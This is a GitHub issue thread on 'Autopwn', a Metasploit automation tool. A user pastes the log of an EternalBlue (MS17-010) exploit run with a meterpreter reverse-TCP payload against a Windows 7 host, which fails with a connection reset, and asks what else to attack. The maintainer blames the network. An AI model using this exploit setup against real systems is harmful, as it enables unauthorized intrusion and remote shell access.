rpranshu / Autopwn

A simple bash based metasploit automation tool!
https://rpranshu.github.io/Autopwn/
Other
121 stars 29 forks source link

Connection reset by peer, Exp Win7 failed #6

Open ZhiboWong opened 1 year ago

ZhiboWong commented 1 year ago

[] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp RHOST => 10.100.128.93 LHOST => 10.100.130.180 PAYLOAD => windows/x64/meterpreter/reverse_tcp [-] Handler failed to bind to 10.100.130.180:4444:- - [] Started reverse TCP handler on 0.0.0.0:4444 [] 10.100.128.93:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check [+] 10.100.128.93:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Ultimate 7601 Service Pack 1 x64 (64-bit) [] 10.100.128.93:445 - Scanned 1 of 1 hosts (100% complete) [+] 10.100.128.93:445 - The target is vulnerable. [] 10.100.128.93:445 - Connecting to target for exploitation. [+] 10.100.128.93:445 - Connection established for exploitation. [+] 10.100.128.93:445 - Target OS selected valid for OS indicated by SMB reply [] 10.100.128.93:445 - CORE raw buffer dump (38 bytes) [] 10.100.128.93:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 55 6c 74 69 6d 61 Windows 7 Ultima [] 10.100.128.93:445 - 0x00000010 74 65 20 37 36 30 31 20 53 65 72 76 69 63 65 20 te 7601 Service [] 10.100.128.93:445 - 0x00000020 50 61 63 6b 20 31 Pack 1
[+] 10.100.128.93:445 - Target arch selected valid for arch indicated by DCE/RPC reply [
] 10.100.128.93:445 - Trying exploit with 12 Groom Allocations. [] 10.100.128.93:445 - Sending all but last fragment of exploit packet [-] 10.100.128.93:445 - Errno::ECONNRESET: Connection reset by peer [] Exploit completed, but no session was created.

This err is same to ms17_101_eternalblue in msf. I guess rhost have open FW or AV. What can I attack?

rpranshu commented 1 year ago

This seems like a peer connection issue, I suggest googling the error, this is not caused by the tool